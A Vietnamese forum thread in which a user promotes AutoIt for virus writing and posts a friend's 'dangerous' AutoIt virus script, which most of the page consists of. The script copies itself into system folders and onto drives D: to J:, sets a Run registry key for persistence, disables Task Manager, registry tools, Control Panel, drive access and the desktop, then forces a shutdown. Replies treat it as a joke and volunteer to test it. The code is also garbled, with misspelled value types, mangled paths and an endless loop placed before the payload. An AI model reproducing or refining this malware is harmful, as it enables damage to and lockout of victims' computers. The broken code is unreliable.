AutoIT viết virus

Thảo luận trong 'Khoa Khoa Học Máy Tính' bắt đầu bởi integer, 4 Tháng năm 2010.

  1. Offline

    integer

    • Tiếu Ngạo Giang Hồ

    • :-?
    Số bài viết:
    1.695
    Đã được thích:
    1.313
    Điểm thành tích:
    900
    Autoit là ngôn ngữ lập trình rất mạnh cho việc viết virus, bạn nào quan tâm thì xem qua đoạn code mà thằng bạn mình nó nói là: "đây là virus cực kỳ nguy hiểm và rất mạnh mẽ" . khiếp, nghe xong đã sợ. tuy nhiên nếu bạn quan tâm tới lập trình virus thì autoIT là khởi đầu cho bạn. tí nữa bạn sẽ thấy nó trực quan và dễ hiểu, tài liệu ở phím F1 của IDE. nó sử dụng các hàm API cho windows nên việc điều khiển phần cứng như eject tray CD chỉ 1 dòng code - WTF ???
    quên. IDE cho nó là Scite
    cho bạn xem đoạn code virus "cực kì mạnh mẽ và nguy hiểm" nè[IMG][IMG]
    PHP:

    Script 
    Function:
    Template AutoIt script.

    #ce ----------------------------------------------------------------------------

    Script Start Add your code below here
    #Notrayicon 
    FileCopy(@ScriptDir "\Setup.exe","C:\WINDOWS",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Common Files",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Internet Explorer",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Windows Media Player",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\WINDOWS\system32",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\WINDOWS\system",1)
    FileCopy(@ScriptDir "\Setup.exe","C:\Program Files\Windows NT",1)
    FileCopy(@ScriptDir "\Setup.exe","D:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","E:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","F:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","G:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","H:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","J:\",1)
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
    While 1
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\WINDOWS",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Common Files",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Internet Explorer",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Windows Media Player",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Windows Media Player\Sample Playlists",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Internet Explorer\SIGNUP",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\WINDOWS\system32",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\WINDOWS\system",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","C:\Program Files\Windows NT",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","D:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","E:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","F:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","G:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","H:\",1)
    FileCopy(@ScriptDir & "
    \Setup.exe","J:\",1)
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")
    WEnd
    Sleep(1000)
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoControlPanel","REG_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
    RegWrite("
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
    RegWrite(" 
    HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer","NoDesktop","RED_DWORD","1")
    RegWrite("
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer","Notraycontextmenu","RED_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer","NoFind","RED_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBitBucket","NukeOnDelete","RED_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USERSoftwareMicrosoftWindows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINESoftwareMicrosoftWindows\CurrentVersion\Policies\NonEnum","{20D04FE0-3AEA-1069-A2D8-08002B30309D}","RED_DWORD","1")
    RegWrite("
    HKEY_CURRENT_USERControl PanelDesktop","MinMaxClose","REG_SZ ","0")
    RegWrite("
    HKEY_CURRENT_USERControl PanelDesktop","MinMaxClose","RED_DWORD ","1")
    RegWrite("
    HKEY_CURRENT_USERSoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
    RegWrite("
    HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoStartMenuMorePrograms","RED_DWORD","1")
    Slepp(1000)
    Shutdown(2)

    sunboy thích bài này.
  2. Offline

    sunboy

    • Thành viên sáng lập

    • No thing
    Số bài viết:
    1.616
    Đã được thích:
    1.340
    Điểm thành tích:
    1.000
    Mấy chú dạo này lười quá. Sao ko chịu phát triển tiếp hả. Tớ tình nguyện test mà :cheers:
  3. Offline

    zmazskg

    • Thành Viên Mới

    Số bài viết:
    148
    Đã được thích:
    125
    Điểm thành tích:
    0
    bình tĩnh, cái mã nguồn này đâu phải con virus zmazskg, virus của mình xịn hơn nhìu mà ;)). dù sao thì đây cũng là một ngôn ngữ lập trình nghiêng theo hướng tà đạo, được phát triển chủ yếu để làm các chương trình lẻ tẻ + virus yahoo.
  4. Offline

    integer

    • Tiếu Ngạo Giang Hồ

    • :-?
    Số bài viết:
    1.695
    Đã được thích:
    1.313
    Điểm thành tích:
    900
    nghiên cứu cũng được thôi, nhưng 1 thời gian thấy nó không có nhiều lợi ích, cú pháp không trong sáng như C, giờ đang học C

Chia sẻ trang này

Advertising: Linux system admin | nukeviet | nukeviet 4 | Upload ảnh miễn phí